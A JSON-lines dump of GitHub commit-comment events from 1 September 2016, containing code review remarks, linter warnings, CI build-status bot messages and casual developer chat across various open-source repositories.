{"id":"4505432807","type":"CommitCommentEvent","actor":{"login":"grosser"},"repo":{"name":"grosser/dotfiles"},"payload":{"comment":{"id":18871515,"position":null,"line":null,"path":null,"commit_id":"eca07c9c69deccdc19a5bcaf7b46b72f14577711","created_at":"2016-09-01T22:09:35Z","updated_at":"2016-09-01T22:09:35Z","body":"stealing the name and error handling :)"}},"created_at":"2016-09-01T22:09:35Z"}
{"id":"4505434959","type":"CommitCommentEvent","actor":{"login":"grosser"},"repo":{"name":"grosser/dotfiles"},"payload":{"comment":{"id":18871520,"position":null,"line":null,"path":null,"commit_id":"eca07c9c69deccdc19a5bcaf7b46b72f14577711","created_at":"2016-09-01T22:10:06Z","updated_at":"2016-09-01T22:10:06Z","body":"... kubash :D "}},"created_at":"2016-09-01T22:10:06Z"}
{"id":"4505439287","type":"CommitCommentEvent","actor":{"login":"c00ni"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18871525,"position":null,"line":null,"path":null,"commit_id":"e3cfabe66bbe43582e2dc43ff63f8ed0e0fcb9dc","created_at":"2016-09-01T22:11:04Z","updated_at":"2016-09-01T22:11:04Z","body":"I'm not entirely sure what's going on with `SPAWN_UNDEF` and `SPAWN_DEF` so I won't make a pull request but this commit errored on line 820.\r\n\r\nYou need to add `DEF` to `typestrs` on line 792 and an extra `0` in the `typecount` array on line 793?"}},"created_at":"2016-09-01T22:11:04Z"}
{"id":"4505444381","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18871546,"position":9,"line":null,"path":"tests/PayslipTest.php","commit_id":"c44fefa90b14cb023615e4b6eab05f81f4162436","created_at":"2016-09-01T22:12:16Z","updated_at":"2016-09-01T22:12:16Z","body":"PHPCS: Method name \"PayslipTest::test_import_file\" is not in camel caps format"}},"created_at":"2016-09-01T22:12:16Z"}
{"id":"4505444438","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18871547,"position":28,"line":null,"path":"tests/PayslipTest.php","commit_id":"c44fefa90b14cb023615e4b6eab05f81f4162436","created_at":"2016-09-01T22:12:16Z","updated_at":"2016-09-01T22:12:16Z","body":"PHPCS: Multi-line function call not indented correctly; expected 8 spaces but found 12"}},"created_at":"2016-09-01T22:12:16Z"}
{"id":"4505444519","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18871548,"position":28,"line":null,"path":"tests/PayslipTest.php","commit_id":"c44fefa90b14cb023615e4b6eab05f81f4162436","created_at":"2016-09-01T22:12:17Z","updated_at":"2016-09-01T22:12:17Z","body":"PHPCS: Closing parenthesis of a multi-line function call must be on a line by itself"}},"created_at":"2016-09-01T22:12:17Z"}
{"id":"4505445800","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18871551,"position":7,"line":null,"path":"tests/PayslipTest.php","commit_id":"c44fefa90b14cb023615e4b6eab05f81f4162436","created_at":"2016-09-01T22:12:34Z","updated_at":"2016-09-01T22:12:34Z","body":"Class PayslipTest is missing a docblock."}},"created_at":"2016-09-01T22:12:34Z"}
{"id":"4505445841","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18871552,"position":9,"line":null,"path":"tests/PayslipTest.php","commit_id":"c44fefa90b14cb023615e4b6eab05f81f4162436","created_at":"2016-09-01T22:12:35Z","updated_at":"2016-09-01T22:12:35Z","body":"PayslipTest::test_import_file is missing a docblock."}},"created_at":"2016-09-01T22:12:35Z"}
{"id":"4505445869","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18871553,"position":38,"line":null,"path":"src/Payslip.php","commit_id":"c44fefa90b14cb023615e4b6eab05f81f4162436","created_at":"2016-09-01T22:12:36Z","updated_at":"2016-09-01T22:12:36Z","body":"Payslip::getEvents is missing a docblock."}},"created_at":"2016-09-01T22:12:36Z"}
{"id":"4505446074","type":"CommitCommentEvent","actor":{"login":"devmsh"},"repo":{"name":"laracamp/tdd"},"payload":{"comment":{"id":18871554,"position":33,"line":33,"path":"ShippingTest.php","commit_id":"1884df6e07520feb9bbce3f2117d4201ff8202ce","created_at":"2016-09-01T22:12:38Z","updated_at":"2016-09-01T22:12:38Z","body":":) تزويد الكمية بحد ذاته هو عملية إضافة"}},"created_at":"2016-09-01T22:12:38Z"}
{"id":"4505446209","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18871555,"position":19,"line":null,"path":"src/Parsers/Csv.php","commit_id":"c44fefa90b14cb023615e4b6eab05f81f4162436","created_at":"2016-09-01T22:12:40Z","updated_at":"2016-09-01T22:12:40Z","body":"\n      Avoid variables with short names like $v. Configured minimum length is 3.\n    "}},"created_at":"2016-09-01T22:12:40Z"}
{"id":"4505448842","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"CovertJaguar/Railcraft"},"payload":{"comment":{"id":18871562,"position":57,"line":116,"path":"src/main/java/mods/railcraft/client/core/ClientProxy.java","commit_id":"83e095e2785b2de8e52d420cf51c5eac147a48e3","created_at":"2016-09-01T22:13:17Z","updated_at":"2016-09-01T22:13:17Z","body":"`LinkedHashSet`?"}},"created_at":"2016-09-01T22:13:17Z"}
{"id":"4505455751","type":"CommitCommentEvent","actor":{"login":"TheImmortal"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":18871578,"position":null,"line":null,"path":null,"commit_id":"0a31d4ff09b8358235d8577ad3f906e1e61ad3f0","created_at":"2016-09-01T22:14:57Z","updated_at":"2016-09-01T22:14:57Z","body":"Forgot to ban UU....."}},"created_at":"2016-09-01T22:14:57Z"}
{"id":"4505457584","type":"CommitCommentEvent","actor":{"login":"jmcphers"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":18871581,"position":29,"line":273,"path":"src/gwt/src/org/rstudio/studio/client/common/mathjax/MathJax.java","commit_id":"ef5a5b063a7ae6b2441e1103924ec37ea1d378fe","created_at":"2016-09-01T22:15:21Z","updated_at":"2016-09-01T22:15:21Z","body":"FYI this won't work on IE10 -- probably okay in this instance since the consequence isn't awful, but for cross-browser support you generally need a 'glass' div "}},"created_at":"2016-09-01T22:15:21Z"}
{"id":"4505460456","type":"CommitCommentEvent","actor":{"login":"RoshanDv"},"repo":{"name":"RoshanDv/answer.pseudo"},"payload":{"comment":{"id":18871586,"position":1,"line":1,"path":"README.md","commit_id":"5bc914129f1a64f0cb4dcc3c8162d0313179b317","created_at":"2016-09-01T22:16:05Z","updated_at":"2016-09-01T22:16:05Z","body":"3.\r\n\r\nname= \"roshan\"\r\n\r\ndef funcName():         #function name defined as funcName\r\n\r\n   var1= name                # a variable \"name\" has been input as a parameter.\r\n\r\n4.\r\n\r\na=raw_input(\"name\")\r\n\r\nfrom random import randint\r\n\r\n   print(a, randint(6,15))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-01T22:16:05Z"}
{"id":"4505464525","type":"CommitCommentEvent","actor":{"login":"allefeld"},"repo":{"name":"allefeld/htcondor-matlab"},"payload":{"comment":{"id":18871600,"position":null,"line":null,"path":null,"commit_id":"152ad6bf8f9287f32a4261c81f056e2a2fb21c80","created_at":"2016-09-01T22:17:07Z","updated_at":"2016-09-01T22:17:07Z","body":"also: better handling of undefined JobStatus, more liberal criterion for 'condorClusters clean'"}},"created_at":"2016-09-01T22:17:07Z"}
{"id":"4505465025","type":"CommitCommentEvent","actor":{"login":"Speins"},"repo":{"name":"Speins/TestRepo"},"payload":{"comment":{"id":18871601,"position":null,"line":null,"path":null,"commit_id":"c891bd1bf0ec2a83402976c204b4478e1551b26d","created_at":"2016-09-01T22:17:12Z","updated_at":"2016-09-01T22:17:12Z","body":"yay"}},"created_at":"2016-09-01T22:17:12Z"}
{"id":"4505473879","type":"CommitCommentEvent","actor":{"login":"aa65535"},"repo":{"name":"aa65535/okhttputils"},"payload":{"comment":{"id":18871621,"position":10,"line":56,"path":"src/main/java/utils/okhttp/request/ParamsBuilder.java","commit_id":"c072a9c8e58f4cea0683534438b97cf6b185e90a","created_at":"2016-09-01T22:19:20Z","updated_at":"2016-09-01T22:19:20Z","body":"@pexcn 我手写的"}},"created_at":"2016-09-01T22:19:20Z"}
{"id":"4505476919","type":"CommitCommentEvent","actor":{"login":"blueyed"},"repo":{"name":"neomake/neomake"},"payload":{"comment":{"id":18871627,"position":138,"line":191,"path":"autoload/neomake.vim","commit_id":"1aa7420a7ca7324d3ba892fd2dbdfd54760f3107","created_at":"2016-09-01T22:20:02Z","updated_at":"2016-09-01T22:20:02Z","body":"@icatalina \r\n`SupersetOf` only appears to be used for ordering though..\r\n\r\nIt is indeed a bit weird.  See https://github.com/neomake/neomake/issues/572."}},"created_at":"2016-09-01T22:20:02Z"}
{"id":"4505478734","type":"CommitCommentEvent","actor":{"login":"jmcphers"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":18871633,"position":10,"line":789,"path":"src/gwt/src/org/rstudio/studio/client/workbench/views/source/editors/text/ChunkOutputWidget.java","commit_id":"ef5a5b063a7ae6b2441e1103924ec37ea1d378fe","created_at":"2016-09-01T22:20:28Z","updated_at":"2016-09-01T22:20:28Z","body":"This does cause a problem; we show an animation when re-opening the output chunk, and with this change the animation is no longer visible (so you just see a pause). Perhaps we need to sync the height beforehand when opening, and afterwards when closing?"}},"created_at":"2016-09-01T22:20:28Z"}
{"id":"4505487160","type":"CommitCommentEvent","actor":{"login":"kevinushey"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":18871652,"position":10,"line":789,"path":"src/gwt/src/org/rstudio/studio/client/workbench/views/source/editors/text/ChunkOutputWidget.java","commit_id":"ef5a5b063a7ae6b2441e1103924ec37ea1d378fe","created_at":"2016-09-01T22:22:34Z","updated_at":"2016-09-01T22:22:34Z","body":"Thanks for catching that -- I agree that emitting both 'before' and 'after' events would be helpful / useful here."}},"created_at":"2016-09-01T22:22:34Z"}
{"id":"4505488437","type":"CommitCommentEvent","actor":{"login":"blittle"},"repo":{"name":"CanopyTax/textAngular"},"payload":{"comment":{"id":18871658,"position":10,"line":97,"path":"src/globals.js","commit_id":"922a8e3b817541f3ab26ee8ae4d6248056e80a91","created_at":"2016-09-01T22:22:55Z","updated_at":"2016-09-01T22:22:55Z","body":"This is what mainly changed"}},"created_at":"2016-09-01T22:22:55Z"}
{"id":"4505489237","type":"CommitCommentEvent","actor":{"login":"JLSG83"},"repo":{"name":"offensive-security/kali-nethunter"},"payload":{"comment":{"id":18871660,"position":4,"line":6,"path":"ISSUE_TEMPLATE.md","commit_id":"3734504f4f527e72c7ca8cfa890f205e4a141066","created_at":"2016-09-01T22:23:07Z","updated_at":"2016-09-01T22:23:07Z","body":"# "}},"created_at":"2016-09-01T22:23:07Z"}
{"id":"4505492196","type":"CommitCommentEvent","actor":{"login":"mfonville"},"repo":{"name":"opengapps/opengapps"},"payload":{"comment":{"id":18871672,"position":null,"line":null,"path":null,"commit_id":"ac38b3dff2eef7efd04e1b87ba95b8ec6b7fad72","created_at":"2016-09-01T22:23:54Z","updated_at":"2016-09-01T22:23:54Z","body":"@rapperskull it is, but I guess for Google there are exceptions X-D\r\nthey can also since Lollipop split APKs into multiple parts, if a system has already a 'local' part it can download a supplement from Play (so not OBB stuff, really an 'extra' part for the APK)"}},"created_at":"2016-09-01T22:23:54Z"}
{"id":"4505492303","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18871673,"position":null,"line":null,"path":null,"commit_id":"24b045af22fdced9bc2b3b5dcb3678af8dc688c9","created_at":"2016-09-01T22:23:56Z","updated_at":"2016-09-01T22:23:56Z","body":"iteration (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-24b045af22fdced9bc2b3b5dcb3678af8dc688c9-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-24b045af22fdced9bc2b3b5dcb3678af8dc688c9-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-01T22:23:56Z"}
{"id":"4505493747","type":"CommitCommentEvent","actor":{"login":"i386"},"repo":{"name":"abayer/jenkins.io"},"payload":{"comment":{"id":18871681,"position":22,"line":22,"path":"content/blog/2016/2016-09-02-jenkins-world-speaker-blog-pipeline-model-definition.adoc","commit_id":"c8520cf045ba8bc49787c6bcc3cf61d836afaaa2","created_at":"2016-09-01T22:24:19Z","updated_at":"2016-09-01T22:24:19Z","body":"```\r\nWhile some of us may react with joy to the idea of the power and control that we get from writing our builds as Pipeline scripts, not everyone feels the same way:  most developers wish to declare what their build needs to do in a config format and get on with building great software.\r\n```"}},"created_at":"2016-09-01T22:24:19Z"}
{"id":"4505506417","type":"CommitCommentEvent","actor":{"login":"i386"},"repo":{"name":"abayer/jenkins.io"},"payload":{"comment":{"id":18871717,"position":38,"line":38,"path":"content/blog/2016/2016-09-02-jenkins-world-speaker-blog-pipeline-model-definition.adoc","commit_id":"c8520cf045ba8bc49787c6bcc3cf61d836afaaa2","created_at":"2016-09-01T22:27:28Z","updated_at":"2016-09-01T22:27:28Z","body":"Here’s a quick example from the plugin’s own Jenkinsfile:"}},"created_at":"2016-09-01T22:27:28Z"}
{"id":"4505511092","type":"CommitCommentEvent","actor":{"login":"mmjsumit"},"repo":{"name":"dabanol/dabanol-world"},"payload":{"comment":{"id":18871734,"position":null,"line":null,"path":null,"commit_id":"c39e17369be5e91326e210a6be203009286a56ce","created_at":"2016-09-01T22:28:38Z","updated_at":"2016-09-01T22:28:38Z","body":"Hi shipukhaan\r\nMmjsumit here \r\nI Find That Dabanol Songsod Is A Youth Culutaral Spotrs Club."}},"created_at":"2016-09-01T22:28:38Z"}
{"id":"4505514725","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18871746,"position":null,"line":null,"path":null,"commit_id":"24b045af22fdced9bc2b3b5dcb3678af8dc688c9","created_at":"2016-09-01T22:29:35Z","updated_at":"2016-09-01T22:29:35Z","body":"iteration (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-24b045af22fdced9bc2b3b5dcb3678af8dc688c9-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-01T22:29:35Z"}
{"id":"4505527048","type":"CommitCommentEvent","actor":{"login":"nooradeen94"},"repo":{"name":"laracamp/tdd"},"payload":{"comment":{"id":18871789,"position":33,"line":33,"path":"ShippingTest.php","commit_id":"1884df6e07520feb9bbce3f2117d4201ff8202ce","created_at":"2016-09-01T22:32:34Z","updated_at":"2016-09-01T22:32:34Z","body":"طيب عادي اضيف بعدين اعمل الاسيرشن ؟ \r\nصح؟"}},"created_at":"2016-09-01T22:32:34Z"}
{"id":"4505527283","type":"CommitCommentEvent","actor":{"login":"feliciaan"},"repo":{"name":"ZeusWPI/zeus.ugent.be"},"payload":{"comment":{"id":18871790,"position":4,"line":4,"path":"content/index.erb","commit_id":"ab41a9b5000c62818ad5b8574597f5b21715ebb5","created_at":"2016-09-01T22:32:38Z","updated_at":"2016-09-01T22:32:38Z","body":"studentenvereniging instead of studentenclub"}},"created_at":"2016-09-01T22:32:38Z"}
{"id":"4505529794","type":"CommitCommentEvent","actor":{"login":"jswrenn"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18871797,"position":null,"line":null,"path":null,"commit_id":"da01a1e026acb4a60d010a5a35fce77001cab86e","created_at":"2016-09-01T22:33:16Z","updated_at":"2016-09-01T22:33:16Z","body":"If both you and Ben think that the pattern is robust and generally useful, I think that'd be a good addition."}},"created_at":"2016-09-01T22:33:16Z"}
{"id":"4505536124","type":"CommitCommentEvent","actor":{"login":"kermitt2"},"repo":{"name":"istex/istex-google-scholar"},"payload":{"comment":{"id":18871819,"position":6,"line":16,"path":"package.json","commit_id":"889b67fb16d50a2a77c6afaa841df01f87e471bd","created_at":"2016-09-01T22:34:47Z","updated_at":"2016-09-01T22:34:47Z","body":"oui c'est bien ça, je suis un newbie en node.js ;) Je vais utiliser le package request"}},"created_at":"2016-09-01T22:34:47Z"}
{"id":"4505537211","type":"CommitCommentEvent","actor":{"login":"monokrome"},"repo":{"name":"samme/jaded-brunch"},"payload":{"comment":{"id":18871820,"position":null,"line":null,"path":null,"commit_id":"79b32288abd4675d6a927ac128ceacdc057d14a5","created_at":"2016-09-01T22:35:06Z","updated_at":"2016-09-01T22:35:06Z","body":"@samme Didn't it work like this already?"}},"created_at":"2016-09-01T22:35:06Z"}
{"id":"4505540979","type":"CommitCommentEvent","actor":{"login":"beretta42"},"repo":{"name":"EtchedPixels/FUZIX"},"payload":{"comment":{"id":18871827,"position":null,"line":null,"path":null,"commit_id":"9751ad52e7ec6d05575522bca540cc877798f54c","created_at":"2016-09-01T22:36:01Z","updated_at":"2016-09-01T22:36:01Z","body":"hmhmh... \r\n```\r\nmake TARGET=coco3\r\nrm -f platform\r\nln -sf platform-coco3 platform\r\nmake -C platform-coco3\r\nmake[1]: Entering directory `/home/beretta/C/FUZIX3/Kernel/platform-coco3'\r\nm6809-unknown-gcc -c -Wall -Os -msoft-reg-count=0 -mfar-stack-param -I/home/beretta/C/FUZIX3/Kernel/cpu-6809 -I/home/beretta/C/FUZIX3/Kernel/platform-coco3 -I/home/beretta/C/FUZIX3/Kernel/include -fno-cprop-registers -I../dev/ -c ttydw.c\r\nIn file included from ttydw.c:79:0:\r\n/home/beretta/C/FUZIX3/Kernel/include/kernel.h:651:24: fatal error: sysinfoblk.h: No such file or directory\r\ncompilation terminated.\r\nmake[1]: *** [ttydw.o] Error 1\r\nmake[1]: Leaving directory `/home/beretta/C/FUZIX3/Kernel/platform-coco3'\r\nmake: *** [target] Error 2\r\nberetta@lappy:~/C/FUZIX3/Kernel$ make TARGET=coco3 makeversion\r\nmake: *** No rule to make target `makeversion'.  Stop.\r\nberetta@lappy:~/C/FUZIX3/Kernel$ make TARGET=coco3 include/kernel.h\r\ntools/makeversion \"0.1\" \"ac1\" coco3\r\n/bin/sh: 1: tools/makeversion: not found\r\nmake: *** [include/sysinfoblk.h] Error 127\r\n```\r\n\r\nLooks like nothing is triggering the build of /tools/makeversion.  \r\n\r\n\r\n"}},"created_at":"2016-09-01T22:36:01Z"}
{"id":"4505545885","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":18871848,"position":null,"line":null,"path":null,"commit_id":"9fb6b6929259dc433a4ed935f3eb7c924c659791","created_at":"2016-09-01T22:37:16Z","updated_at":"2016-09-01T22:37:16Z","body":"great work man.congratz :)\r\nseems like i will bug you a lot about optcm port :/ :P"}},"created_at":"2016-09-01T22:37:16Z"}
{"id":"4505553784","type":"CommitCommentEvent","actor":{"login":"KiberInfinity"},"repo":{"name":"VkOpt/VkOpt"},"payload":{"comment":{"id":18871874,"position":null,"line":null,"path":null,"commit_id":"d05b7117a15877afcaee346c177c8b21604f06bf","created_at":"2016-09-01T22:39:23Z","updated_at":"2016-09-01T22:39:23Z","body":"Есть косяк с сортировкой по названиям страниц. "}},"created_at":"2016-09-01T22:39:23Z"}
{"id":"4505554317","type":"CommitCommentEvent","actor":{"login":"hhrhhr"},"repo":{"name":"emoose/MBINCompiler"},"payload":{"comment":{"id":18871876,"position":18,"line":18,"path":"MBINCompiler/Models/Structs/GcProductData.cs","commit_id":"24d7b28c7ea9f5383e9d84f2c5d538dbbd7f7124","created_at":"2016-09-01T22:39:31Z","updated_at":"2016-09-01T22:39:31Z","body":"not \"Debis\", but \"DebrisFile\".\r\n![debis](https://cloud.githubusercontent.com/assets/966048/18186876/06ae3f0a-70ae-11e6-9a1d-86aad6bbb713.png)\r\n"}},"created_at":"2016-09-01T22:39:31Z"}
{"id":"4505554717","type":"CommitCommentEvent","actor":{"login":"jaec1146"},"repo":{"name":"jaec1146/hellow-world"},"payload":{"comment":{"id":18871879,"position":null,"line":null,"path":null,"commit_id":"10c8ba6780fc072524cbf0b11608d457897e677e","created_at":"2016-09-01T22:39:37Z","updated_at":"2016-09-01T22:39:37Z","body":"prueba de comentario"}},"created_at":"2016-09-01T22:39:37Z"}
{"id":"4505561387","type":"CommitCommentEvent","actor":{"login":"ampli"},"repo":{"name":"opencog/link-grammar"},"payload":{"comment":{"id":18871904,"position":4,"line":265,"path":"bindings/python/linkgrammar.py","commit_id":"8d779a5f0a1f897e8e61ed9f4dbb4806d1577ca7","created_at":"2016-09-01T22:41:21Z","updated_at":"2016-09-01T22:41:21Z","body":"It seems I had some kind of phase-shift...\r\nThe \"dictionary object Boolean check\" has been added in the previous commit as needed.\r\nThis commit is actually for dictionary_get_lang() when using the dictionary object as a string."}},"created_at":"2016-09-01T22:41:21Z"}
{"id":"4505561960","type":"CommitCommentEvent","actor":{"login":"jburson"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":18871905,"position":null,"line":null,"path":null,"commit_id":"979657989bab4fb93faf6a207d30760faa9bd696","created_at":"2016-09-01T22:41:29Z","updated_at":"2016-09-01T22:41:29Z","body":"Looks like this broke some builds, because the upgrade module refers to \"core.umd.js\" instead of \"upgrade.umd.js\".\r\n\r\nhttps://github.com/angular/angular/issues/11249"}},"created_at":"2016-09-01T22:41:29Z"}
{"id":"4505563271","type":"CommitCommentEvent","actor":{"login":"beretta42"},"repo":{"name":"EtchedPixels/FUZIX"},"payload":{"comment":{"id":18871912,"position":null,"line":null,"path":null,"commit_id":"9751ad52e7ec6d05575522bca540cc877798f54c","created_at":"2016-09-01T22:41:50Z","updated_at":"2016-09-01T22:41:50Z","body":"it does work nicely if I make makeversion and include/sysinfoblk.h manually."}},"created_at":"2016-09-01T22:41:50Z"}
{"id":"4505568872","type":"CommitCommentEvent","actor":{"login":"CovertJaguar"},"repo":{"name":"CovertJaguar/Railcraft"},"payload":{"comment":{"id":18871922,"position":57,"line":116,"path":"src/main/java/mods/railcraft/client/core/ClientProxy.java","commit_id":"83e095e2785b2de8e52d420cf51c5eac147a48e3","created_at":"2016-09-01T22:43:14Z","updated_at":"2016-09-01T22:43:14Z","body":"I guess, but it's not really a piece of code that needs to be performant, it only happens once or twice per game session."}},"created_at":"2016-09-01T22:43:14Z"}
{"id":"4505569266","type":"CommitCommentEvent","actor":{"login":"alecdavis"},"repo":{"name":"nanopb/nanopb"},"payload":{"comment":{"id":18871923,"position":16,"line":167,"path":"docs/concepts.rst","commit_id":"62afd54964528c1fbd5ab802134f7e9ad912d904","created_at":"2016-09-01T22:43:20Z","updated_at":"2016-09-01T22:43:20Z","body":"Shouldn't (nanopb.type) be (nanopb).type"}},"created_at":"2016-09-01T22:43:20Z"}
{"id":"4505569837","type":"CommitCommentEvent","actor":{"login":"NitroxydeX"},"repo":{"name":"EternalBlueFlame/Traincraft-5"},"payload":{"comment":{"id":18871925,"position":144,"line":108,"path":"src/main/java/train/common/tile/TileWaterWheel.java","commit_id":"827027a298d82d432cda4d621cff702fe4540e9c","created_at":"2016-09-01T22:43:30Z","updated_at":"2016-09-01T22:43:30Z","body":"setWaterDir and getWaterDir seems pretty useless but Render bugged without this shit."}},"created_at":"2016-09-01T22:43:30Z"}
{"id":"4505582932","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18871955,"position":null,"line":null,"path":null,"commit_id":"6260a69fb9253c437660f363515c01d8807fadec","created_at":"2016-09-01T22:46:59Z","updated_at":"2016-09-01T22:46:59Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6260a69fb9253c437660f363515c01d8807fadec-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6260a69fb9253c437660f363515c01d8807fadec-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-01T22:46:59Z"}
{"id":"4505585737","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18871963,"position":null,"line":null,"path":null,"commit_id":"ac272125cd1d22eb526b1479b39cc34f5baa8367","created_at":"2016-09-01T22:47:42Z","updated_at":"2016-09-01T22:47:42Z","body":"iteration (kbenne) - x86_64-MacOS-10.10-clang: OK (2382 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ac272125cd1d22eb526b1479b39cc34f5baa8367-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ac272125cd1d22eb526b1479b39cc34f5baa8367-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.3%25-yellow.svg)</a> \n"}},"created_at":"2016-09-01T22:47:42Z"}
{"id":"4505594666","type":"CommitCommentEvent","actor":{"login":"matthewd"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":18871992,"position":5,"line":11,"path":"activemodel/lib/active_model/type/helpers/numeric.rb","commit_id":"810dff7c9fa9b2a38eb1560ce0378d760529ee6b","created_at":"2016-09-01T22:49:57Z","updated_at":"2016-09-01T22:49:57Z","body":"If rubocop thinks this is right, it's misconfigured."}},"created_at":"2016-09-01T22:49:57Z"}
{"id":"4505599608","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"selivanov-d/ror-basics-course"},"payload":{"comment":{"id":18872006,"position":31,"line":31,"path":"Lesson_7/models/carriage.rb","commit_id":"412c30516e9bdd8011275585962badb7f6a04765","created_at":"2016-09-01T22:51:15Z","updated_at":"2016-09-01T22:51:15Z","body":"Да, всё верно."}},"created_at":"2016-09-01T22:51:15Z"}
{"id":"4505602383","type":"CommitCommentEvent","actor":{"login":"rakeshr1"},"repo":{"name":"Stanford-Mobisocial-IoT-Lab/sempre"},"payload":{"comment":{"id":18872017,"position":null,"line":null,"path":null,"commit_id":"c20f0535385827383a4e65b45a138b756588bdaa","created_at":"2016-09-01T22:52:02Z","updated_at":"2016-09-01T22:52:02Z","body":"This is pretty smart learning. Did it actually improve the learning?"}},"created_at":"2016-09-01T22:52:02Z"}
{"id":"4505603720","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18872020,"position":null,"line":null,"path":null,"commit_id":"6260a69fb9253c437660f363515c01d8807fadec","created_at":"2016-09-01T22:52:25Z","updated_at":"2016-09-01T22:52:25Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6260a69fb9253c437660f363515c01d8807fadec-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-01T22:52:25Z"}
{"id":"4505604408","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"selivanov-d/ror-basics-course"},"payload":{"comment":{"id":18872023,"position":22,"line":22,"path":"Lesson_7/models/carriage.rb","commit_id":"412c30516e9bdd8011275585962badb7f6a04765","created_at":"2016-09-01T22:52:37Z","updated_at":"2016-09-01T22:52:37Z","body":"Иногда при итерации с помощью `each` действительно не используют ключ (или значение) тогда пишут так: `some_hash.each_pair { |_, value| p value }` нижнее подчёркивание это в принципе допустимое имя переменной, визуально получается что мы показываем что не используем ключ в блоке. Как ни странно, в Go тоже есть такой приём."}},"created_at":"2016-09-01T22:52:37Z"}
{"id":"4505605077","type":"CommitCommentEvent","actor":{"login":"JFDaly"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18872025,"position":null,"line":null,"path":null,"commit_id":"666b26dabc7b738808b414feb3561275a4433bf8","created_at":"2016-09-01T22:52:48Z","updated_at":"2016-09-01T22:52:48Z","body":"Oh cool. I can adapt the tag into Djoser when I next update him."}},"created_at":"2016-09-01T22:52:48Z"}
